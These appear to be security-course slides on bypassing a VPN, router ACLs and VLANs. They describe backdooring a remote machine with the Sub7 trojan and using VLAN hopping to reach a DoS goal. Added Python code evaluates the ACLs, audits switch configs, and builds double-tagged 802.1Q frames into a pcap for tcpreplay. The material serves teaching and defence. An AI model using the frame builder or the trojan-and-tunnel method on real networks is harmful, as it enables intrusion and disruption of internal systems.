Slide 1 - ECE Users Pages
Bypass a VPN, ACL, and VLAN
ECE 4112
Alaric Craig and Pritesh Patel
Goal
Bypass three layers of security:
VPN
Router ACLs
VLAN
Effectively, an outsider could bring an internal network down with a DoS attack.
Method
Exploit an authenticated remote machine.
Use its established VPN tunnel.
Send traffic that bypasses the router ACLs and crosses VLANs.
How
Use Sub7 to create a backdoor on the remote machine.
From the remote machine, use the existing VPN tunnel to communicate with the inside of the network.
Now that we have access, perform a VLAN hopping attack.
Sub7
Trojan horse used to gain root-level access to the victim machine
Many fun modules:
Keylogging
Enable telnet and ftp
Tic tac toe
Realistic Matrix
In our case
VPN Bypassed
Once on the remote machine, telnet to the VLAN 1 machine and send the VLAN hopping traffic from there.
VPNs used: Cisco VPN Concentrator and OpenVPN. Once the connection is set up, the prompt on the compromised machine can be used to send traffic to the internal machine; to the VPN endpoint it is simply the authenticated user's traffic.
VLANs
Virtual Local Area Networks
A logical grouping of devices or users
Users can be grouped by function, department, or application, regardless of physical segment location
VLAN configuration is done at the switch (Layer 2)
VLAN Membership
Static VLAN Assignment
- Port-based membership: membership is determined by the port on the switch, not by the host.
Dynamic VLAN Assignment
- Membership is determined by the host's MAC address. The administrator has to create a database of MAC address to VLAN mappings.
VLAN Communication
VLANs cannot communicate with each other directly, even when they exist on the same switch
For VLANs to communicate they must pass through a router (a Layer 3 device)
Each VLAN is required to have at least one gateway to route packets in and out of the VLAN
VLAN Trunking
Trunking allows us to cascade multiple switches, using trunk ports to interconnect them
A trunk port carries the traffic of every VLAN between switches over a single link, with each frame tagged so the far switch knows which VLAN it belongs to
The trunk port is a member of all configured VLANs
VLAN Tagging
Two dominant tagging technologies:
- Inter-Switch Link (ISL) (Cisco proprietary technology)
- IEEE 802.1Q (industry-adopted standard)
VLAN Network Setup
Access Control List
Router ACLs:
Standard IP access list ADMIN
10 permit 192.168.0.0, wildcard bits 0.0.151.255
20 permit 57.35.0.0, wildcard bits 0.0.159.255
30 deny any log
Extended IP access list ACCT
10 permit icmp any any echo-reply
20 deny ip 10.1.10.0 0.0.0.255 192.168.0.0 0.0.151.255
30 permit ip 57.35.0.0 0.0.159.255 192.168.0.0 0.0.151.255
40 deny ip any any log
Extended IP access list IT
10 permit icmp any any echo-reply (24 matches)
90 deny ip 10.1.10.0 0.0.0.255 57.35.0.0 0.0.159.255
100 deny ip 192.168.0.0 0.0.151.255 57.35.0.0 0.0.159.255
110 deny ip any any log
ACL Demonstration
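An added example, not from the original slides, that evaluates the ACLs listed above the way the router does: first match wins, unmatched traffic hits the implicit deny, and wildcard-mask bits that are set are ignored. The ACL text is the listing from the slide; the packets and the helper names are constructed for the example. It also shows why the non-contiguous wildcard 0.0.151.255 admits a scattered set of third-octet values rather than a range, which is easy to misread when checking what an ACL actually lets through.

```python
"""Evaluate the router ACLs from the slide against constructed packets.

Added example, not part of the original slides. Models Cisco IOS wildcard
matching (a 0 bit in the mask must equal the base address, a 1 bit is a
don't-care) and first-match evaluation with the implicit deny at the end.
ACL_TEXT is the slide's listing; the packets below are constructed.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional

ACL_TEXT = """\
Standard IP access list ADMIN
10 permit 192.168.0.0, wildcard bits 0.0.151.255
20 permit 57.35.0.0, wildcard bits 0.0.159.255
30 deny any log
Extended IP access list ACCT
10 permit icmp any any echo-reply
20 deny ip 10.1.10.0 0.0.0.255 192.168.0.0 0.0.151.255
30 permit ip 57.35.0.0 0.0.159.255 192.168.0.0 0.0.151.255
40 deny ip any any log
Extended IP access list IT
10 permit icmp any any echo-reply (24 matches)
90 deny ip 10.1.10.0 0.0.0.255 57.35.0.0 0.0.159.255
100 deny ip 192.168.0.0 0.0.151.255 57.35.0.0 0.0.159.255
110 deny ip any any log
"""

ANY = ("0.0.0.0", "255.255.255.255")   # "any": base 0.0.0.0, every bit don't-care


@dataclass
class Entry:
    seq: int
    action: str
    proto: str            # "ip" or "icmp"; standard ACL entries are treated as "ip"
    src: tuple            # (base address, wildcard mask)
    dst: tuple
    icmp_type: Optional[str] = None


@dataclass
class Packet:
    src: str
    dst: str
    proto: str
    icmp_type: Optional[str] = None


def wildcard_match(addr, base, wildcard):
    """Cisco semantics: bits set in the wildcard are ignored, all others must match."""
    care = ~int(ipaddress.IPv4Address(wildcard)) & 0xFFFFFFFF
    return (int(ipaddress.IPv4Address(addr)) & care) == (int(ipaddress.IPv4Address(base)) & care)


def _take_addr(tokens):
    """Consume 'any' or 'ADDRESS WILDCARD' from an extended entry."""
    if tokens[0] == "any":
        return ANY, tokens[1:]
    return (tokens[0], tokens[1]), tokens[2:]


def parse_acls(text):
    """Parse 'show ip access-lists' output into {name: [Entry, ...]}."""
    acls, kind, name = {}, None, None
    for line in text.splitlines():
        t = line.split()
        if t[0] in ("Standard", "Extended"):
            kind, name = t[0], t[-1]
            acls[name] = []
            continue
        seq, action = int(t[0]), t[1]
        if kind == "Standard":
            # "permit 192.168.0.0, wildcard bits 0.0.151.255"  or  "deny any log"
            src = ANY if t[2] == "any" else (t[2].rstrip(","), t[5])
            acls[name].append(Entry(seq, action, "ip", src, ANY))
        else:
            proto, rest = t[2], t[3:]
            src, rest = _take_addr(rest)
            dst, rest = _take_addr(rest)
            icmp = rest[0] if proto == "icmp" and rest and rest[0] != "log" else None
            acls[name].append(Entry(seq, action, proto, src, dst, icmp))
    return acls


def evaluate(acls, name, pkt):
    """Return (action, sequence number); ("deny", None) is the implicit deny."""
    for e in acls[name]:
        if e.proto != "ip" and e.proto != pkt.proto:
            continue
        if e.icmp_type and e.icmp_type != pkt.icmp_type:
            continue
        if wildcard_match(pkt.src, *e.src) and wildcard_match(pkt.dst, *e.dst):
            return e.action, e.seq
    return "deny", None


def matching_third_octets(base, wildcard):
    """Third-octet values the mask admits. 0.0.151.255 is non-contiguous
    (151 = 10010111b), so bits 64, 32 and 8 must be zero: 32 scattered values."""
    b = base.split(".")
    return [o for o in range(256) if wildcard_match(f"{b[0]}.{b[1]}.{o}.0", base, wildcard)]
```

Run `evaluate(parse_acls(ACL_TEXT), "ACCT", Packet("10.1.10.5", "192.168.1.10", "tcp"))` to see which line of ACCT catches accounting-to-admin traffic, and `matching_third_octets("192.168.0.0", "0.0.151.255")` to see that 192.168.8.0 and 192.168.32.0 fall outside the ADMIN list even though 192.168.151.0 is inside it.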
Switch Default Configuration
Dynamic Trunking Protocol (DTP) automates ISL/802.1Q trunk configuration
DTP States:
On: "I want to be a trunk and I don't care what you think!" The port trunks unconditionally but still sends DTP frames, so the neighbor learns that it is a trunk.
Off: "I don't want to be a trunk and I don't care what you think!" State used when the configured port is not intended to be a trunk port (access mode).
Desirable: "I'm willing to become a VLAN trunk; are you interested?" State used when the switch actively wants to be a trunk; it becomes one if the neighbor is on, desirable, or auto.
Auto: "I'm willing to go with whatever you want!" The port becomes a trunk only if the neighbor is on or desirable. This is the default on many switches, and it is what the basic VLAN hopping attack depends on.
Nonegotiate: "I want to trunk, and this is what kind of trunk I will be!" The port trunks without sending DTP frames; use it when the other switch does not understand DTP.
Native VLAN set to VLAN 1 (the VLAN whose frames cross an 802.1Q trunk untagged)
VLAN Hopping Attacks
These attacks are designed to allow the attacker to bypass the Layer 3 device, and with it the router ACLs
The attack takes advantage of incorrectly configured trunk ports on network switches
VLAN Hopping Attacks
Basic VLAN Hopping Attack
1. The attacker fools the switch into thinking that he is a switch that needs trunking, by sending DTP frames into his access port
2. The attack needs a trunking-favorable setting such as Auto or Desirable on that port to succeed
3. The attacker is now a member of all trunked VLANs on the switch and can send and receive data on those VLANs
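A check for the switch conditions the DTP slide and the basic attack above both rely on, as an added example that is not part of the original slides. It parses a constructed Catalyst-style running-config and reports ports that will negotiate a trunk with a host, trunks that still speak DTP, native VLAN 1, and access ports sitting in a trunk's native VLAN (the double-tagging precondition). Interface names, VLAN numbers and the assumption that a port with no explicit mode negotiates trunking are assumptions of the example; the platform default differs between switch models.

```python
"""Audit a Catalyst-style running-config for the DTP and native-VLAN
conditions VLAN hopping relies on. Added example; the config text,
interface names and VLAN numbers are constructed, and "no explicit mode
means DTP negotiation is on" is an assumption that varies by platform.
"""

SAMPLE_CONFIG = """\
!
interface FastEthernet0/1
 description user port left at factory defaults
!
interface FastEthernet0/2
 switchport access vlan 10
 switchport mode dynamic auto
!
interface FastEthernet0/3
 switchport access vlan 1
 switchport mode access
!
interface FastEthernet0/24
 description uplink to distribution switch
 switchport trunk encapsulation dot1q
 switchport mode trunk
!
interface GigabitEthernet0/1
 switchport trunk encapsulation dot1q
 switchport trunk native vlan 999
 switchport mode trunk
 switchport nonegotiate
!
"""


def parse_interfaces(config):
    """Return {interface name: [config lines]} for each 'interface' stanza."""
    ifaces, cur = {}, None
    for raw in config.splitlines():
        line = raw.strip()
        if line.startswith("interface "):
            cur = line.split(None, 1)[1]
            ifaces[cur] = []
        elif line == "!":
            cur = None
        elif cur is not None and line:
            ifaces[cur].append(line)
    return ifaces


def _vlan(lines, prefix, default):
    """Trailing VLAN number of a 'switchport ... vlan N' line, else the default."""
    for l in lines:
        if l.startswith(prefix):
            return int(l.split()[-1])
    return default


def audit_config(config):
    """Return a list of (interface, finding) pairs."""
    findings, trunk_native, access_vlan = [], {}, {}
    for name, lines in parse_interfaces(config).items():
        mode = next((" ".join(l.split()[2:]) for l in lines
                     if l.startswith("switchport mode ")), None)
        if mode is None:
            findings.append((name, "no explicit switchport mode: DTP negotiation is left "
                                   "at the platform default (dynamic on many switches)"))
        elif mode.startswith("dynamic"):
            findings.append((name, f"switchport mode {mode}: a host sending DTP frames "
                                   "can turn this port into a trunk (basic VLAN hopping)"))
        if mode == "trunk":
            native = _vlan(lines, "switchport trunk native vlan", 1)
            trunk_native[name] = native
            if "switchport nonegotiate" not in lines:
                findings.append((name, "trunk still speaks DTP: add 'switchport nonegotiate'"))
            if native == 1:
                findings.append((name, "trunk uses native VLAN 1 (default): move it to an unused VLAN"))
        else:
            access_vlan[name] = _vlan(lines, "switchport access vlan", 1)
    # Double-tagging precondition: an access port sits in some trunk's native VLAN.
    for aport, vlan in access_vlan.items():
        for tport, native in trunk_native.items():
            if vlan == native:
                findings.append((aport, f"access VLAN {vlan} is the native VLAN of trunk {tport}: "
                                        "double-tagged frames from here leave the trunk untagged "
                                        "with the inner tag exposed"))
    return findings


def hardened_access_stanza(name, vlan):
    """Config that closes both holes for a user-facing port (vlan must not be a trunk's native VLAN)."""
    return [f"interface {name}",
            " switchport mode access",
            f" switchport access vlan {vlan}",
            " switchport nonegotiate"]


if __name__ == "__main__":
    for iface, finding in audit_config(SAMPLE_CONFIG):
        print(f"{iface}: {finding}")
```

On the constructed config, GigabitEthernet0/1 is the only clean port: explicit trunk mode, nonegotiate, and a native VLAN that no access port uses.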
VLAN Hopping Attacks
Double Encapsulated VLAN Hopping Attack
1. Switches perform only one level of IEEE 802.1Q decapsulation
2. This allows the attacker to put a second .1Q tag inside the frame, so the frame reaches a VLAN that the outer tag did not specify
3. This attack works even if the attacker's port has trunking set to OFF, because the outer tag is stripped as the frame enters the switch. It requires that the attacker's access VLAN be the native VLAN of the 802.1Q trunk between the switches, and it is one way: the victim's replies are not double-tagged back
Identification of VLAN Tags Using Ethereal (now Wireshark)
VLAN Tag
81 00 0n nn
The 802.1Q tag is four bytes after the source MAC: TPID 81 00, then the TCI, whose low 12 bits (0n nn) are the VLAN ID
VLAN Hopping Attack Using
Tcpreplay
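The double-encapsulated frame from the slides above, carried through both switches, as an added example that is not from the original slides or from tcpreplay's own code. It builds the 81 00 0n nn tags the Ethereal slide identifies, models the single decapsulation step each switch performs, and writes a pcap that tcpreplay can send. MAC addresses, VLAN IDs and the payload are constructed, and the switch model is an assumption: it follows the 802.1Q rules the slides describe, but exact handling of tagged frames on access ports varies by platform.

```python
"""Double-encapsulated 802.1Q frames: build one, model what each switch does
with it, and write it to a pcap that tcpreplay can send. Added example, not
taken from the slides or from tcpreplay. MAC addresses, VLAN IDs and the
payload are constructed; the switch behaviour is a model of the 802.1Q
rules in the slides (real access ports differ by platform).
"""
import struct

TPID_8021Q = 0x8100
ETHERTYPE_IPV4 = 0x0800
PAYLOAD = b"\x45\x00" + b"\x00" * 18      # placeholder bytes, not a valid IPv4 packet


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def dot1q_tag(vid, pcp=0, dei=0):
    """4-byte tag: TPID 81 00, then TCI = PCP(3 bits) | DEI(1) | VID(12).
    With PCP and DEI zero this is the '81 00 0n nn' pattern seen in Ethereal."""
    if not 0 <= vid <= 4094:
        raise ValueError("VLAN ID out of range")
    return struct.pack("!HH", TPID_8021Q, (pcp << 13) | (dei << 12) | vid)


def build_frame(dst, src, vids, ethertype, payload):
    """Ethernet frame carrying one 802.1Q tag per VID, outermost first."""
    tags = b"".join(dot1q_tag(v) for v in vids)
    return mac(dst) + mac(src) + tags + struct.pack("!H", ethertype) + payload


def parse_tags(frame):
    """Read every stacked tag: returns ([vid, ...], ethertype, payload)."""
    vids, off = [], 12
    while struct.unpack_from("!H", frame, off)[0] == TPID_8021Q:
        vids.append(struct.unpack_from("!H", frame, off + 2)[0] & 0x0FFF)
        off += 4
    return vids, struct.unpack_from("!H", frame, off)[0], frame[off + 2:]


def pop_tag(frame):
    return frame[:12] + frame[16:]


def first_switch(frame, access_vlan, trunk_native):
    """Attacker's switch: ingress on an access port, egress on an 802.1Q trunk.
    Exactly one tag is examined. Returns the frame as placed on the trunk, or
    None if the switch drops it."""
    vids, _, _ = parse_tags(frame)
    if vids:
        if vids[0] != access_vlan:       # tagged for a VLAN this port is not in
            return None
        frame = pop_tag(frame)           # the single decapsulation step
    if access_vlan == trunk_native:
        return frame                     # native VLAN crosses the trunk untagged
    return frame[:12] + dot1q_tag(access_vlan) + frame[12:]   # otherwise re-tagged


def second_switch(frame, trunk_native):
    """Far switch: VLAN is the outer tag if present, else the trunk's native VLAN.
    Returns (vlan the frame is delivered to, frame after that tag is popped)."""
    vids, _, _ = parse_tags(frame)
    return (vids[0], pop_tag(frame)) if vids else (trunk_native, frame)


def pcap_bytes(frames, linktype=1):
    """Minimal libpcap file (v2.4, LINKTYPE_ETHERNET) for `tcpreplay -i eth0 x.pcap`."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    hop = build_frame("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", [1, 20], ETHERTYPE_IPV4, PAYLOAD)
    on_trunk = first_switch(hop, access_vlan=1, trunk_native=1)
    print("delivered to VLAN", second_switch(on_trunk, trunk_native=1)[0])   # 20
    with open("double_tag.pcap", "wb") as fh:
        fh.write(pcap_bytes([hop]))
```

With the attacker on VLAN 1 and the trunk's native VLAN also 1, the first switch strips the outer tag and forwards the frame untagged, so the far switch sees tag 20 and delivers into VLAN 20. Put the same attacker in VLAN 10 and the first switch re-tags the frame with 10 on egress; the inner tag 20 stays buried behind it and the frame never leaves VLAN 10, which is why the native VLAN condition matters.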